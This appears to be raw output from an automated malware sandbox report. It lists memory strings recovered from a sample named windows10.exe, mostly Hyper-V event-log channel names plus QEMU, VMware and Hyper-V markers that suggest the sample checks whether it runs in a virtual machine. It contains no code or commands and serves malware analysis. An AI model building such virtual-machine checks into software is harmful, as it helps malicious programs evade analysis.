            Source: windows10.exe, 0000001D.00000003.2365111459.0000000000835000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2363728442.000000000082D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2262021134.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354495829.000000000070F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628455964.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-OperationalLMEMh
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2145511697.000000007FDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SecureVirtualMachine
            Source: windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3218987599.000000000A060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin.
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin2
            Source: windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin'
            Source: windows10.exe, 0000001D.00000003.2365111459.0000000000835000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2363728442.000000000082D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2262021134.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354495829.000000000070F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628455964.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DiagnoseLMEMh
            Source: windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2680934915.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational\
            Source: windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin6
            Source: windows10.exe, 0000001E.00000003.3321671075.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3316480949.000000000A04D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugatLMEM`
            Source: windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3218987599.000000000A060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Admin{
            Source: windows10.exe, 0000001E.00000003.2503011294.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2502558872.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin<
            Source: windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3415956998.000000000A072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalpXDe
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591548285.000000000A044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operationalb
            Source: windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminD
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminM
            Source: windows10.exe, 0000001D.00000003.2365111459.0000000000835000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2363728442.000000000082D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2262021134.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354495829.000000000070F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628455964.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AnalyticLMEMh
            Source: windows10.exe, 0000001D.00000003.2360129481.000000000086D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2367709156.0000000000872000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3124024616.000000000A05C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308870441.0000000000716000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Admin
            Source: windows10.exe, 0000001D.00000003.2360129481.000000000086D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2367709156.0000000000872000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3124024616.000000000A05C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2502753532.000000000A05C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3323654097.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic
            Source: windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308870441.0000000000710000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307427865.0000000000714000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308352872.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Adminv@_
            Source: windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011554215.000000000A04F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminT
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Enterprise without Hyper-V Full
            Source: windows10.exe, 0000001D.00000003.2367709156.000000000086A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic
            Source: windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011554215.000000000A04F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3124024616.000000000A066000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operationaly
            Source: windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operationaly
            Source: windows10.exe, 0000001E.00000003.2260356698.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2263029357.00000000006D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic'
            Source: windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMh0fm@
            Source: windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2356244803.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debug
            Source: windows10.exe, 0000001E.00000003.3510497039.00000000006EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMh
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Standard without Hyper-V Full
            Source: windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3124024616.000000000A066000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose{
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3318845003.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2261162509.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/DiagnosticLMEMX
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AnalyticLMEMhd
            Source: windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AdminLMEM`0
            Source: windows10.exe, 0000001D.00000003.2367709156.000000000086A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3323654097.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin
            Source: windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3218987599.000000000A060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic!
            Source: windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminK
            Source: windows10.exe, 0000001E.00000003.2415217489.000000000071E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416072475.000000000071E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AdminPaLMEM`@fm
            Source: windows10.exe, 0000001E.00000003.2263569596.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2264564819.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2260356698.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2263029357.00000000006D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operationalltu
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2896982508.00000000006F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminLMEMXT
            Source: windows10.exe, 0000001E.00000003.3510497039.00000000006EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DiagnoseLMEMh$
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: stQEMU
            Source: windows10.exe, 0000001D.00000003.2367709156.000000000086A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analytic
            Source: windows10.exe, 0000001D.00000003.2367709156.000000000086A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debug)
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2896982508.00000000006F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/DiagnosticLMEMXH
            Source: windows10.exe, 0000001D.00000003.2365111459.0000000000835000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2363728442.000000000082D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2262021134.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354495829.000000000070F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3009374102.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3320507831.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMh
            Source: windows10.exe, 0000001E.00000003.2308870441.0000000000716000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308352872.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational|FR
            Source: windows10.exe, 0000001E.00000003.2502753532.000000000A05C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2355303518.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591548285.000000000A044000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2502347484.000000000A058000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354825006.000000000A045000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2500722600.000000000A049000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Adminp
            Source: windows10.exe, 0000001E.00000003.3321671075.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3316480949.000000000A04D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticosLMEM`
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticA
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic2
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Standard without Hyper-V Core
            Source: windows10.exe, 0000001D.00000003.2366816542.000000000084D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2368207015.000000000085A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3515474400.000000000A067000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3514693196.000000000A065000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operational
            Source: windows10.exe, 0000001E.00000003.3323654097.000000000A054000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3316480949.000000000A04D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3321671075.000000000A058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminS
            Source: windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic8
            Source: windows10.exe, 0000001E.00000003.3510497039.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513026110.00000000006F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osoft-Windows-Hyper-V-VID-AnalyticLMEMP
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A057000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operationalp
            Source: windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3415956998.000000000A05F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A057000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminpZ
            Source: windows10.exe, 0000001D.00000002.4159390497.00000000007D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rod_VMware_SATA_
            Source: windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-OperationalLMEMh$fm`
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Admin\
            Source: windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416637758.00000000006F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic0
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminZ
